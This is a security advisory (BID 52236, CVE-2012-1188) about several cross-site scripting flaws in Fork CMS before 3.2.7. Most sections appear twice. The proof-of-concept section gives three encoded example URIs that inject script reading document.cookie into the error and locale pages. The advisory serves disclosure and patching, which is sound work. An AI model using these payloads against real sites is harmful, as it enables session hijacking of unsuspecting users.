Fork CMS Multiple Cross Site Scripting Vulnerabilities
BID:52236
Info
Fork CMS Multiple Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 52236 |
| Class: | Input Validation Error |
| CVE: |
CVE-2012-1188 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 28 2012 12:00AM |
| Updated: | Mar 08 2012 10:20AM |
| Credit: | High-Tech Bridge SA Security Research Lab |
| Vulnerable: |
Fork CMS Fork CMS 3.2.5 Fork CMS Fork CMS 3.2.4 Fork CMS Fork CMS 3.1.5 |
| Not Vulnerable: |
Fork CMS Fork CMS 3.2.7 |
Discussion
Fork CMS Multiple Cross Site Scripting Vulnerabilities
Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Fork CMS versions prior to 3.2.7 are vulnerable.
Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Fork CMS versions prior to 3.2.7 are vulnerable.
Exploit / POC
Fork CMS Multiple Cross Site Scripting Vulnerabilities
Attackers can exploit these issues by enticing an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/private/en/error?type=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/private/en/error?type=action-not-allowed&querystring=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E.1
http://www.example.com/private/en/locale/index?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Attackers can exploit these issues by enticing an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/private/en/error?type=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/private/en/error?type=action-not-allowed&querystring=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E.1
http://www.example.com/private/en/locale/index?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Solution / Fix
Fork CMS Multiple Cross Site Scripting Vulnerabilities
Solution:
Updates are available. Please see the references for more details.
Solution:
Updates are available. Please see the references for more details.
References
Fork CMS Multiple Cross Site Scripting Vulnerabilities
References:
References:
- Fork CMS 3.2.7 released (Fork CMS)
- Fork CMS Homepage (Fork CMS)
- Multiple XSS in Fork CMS (High-Tech Bridge SA Security Research Lab)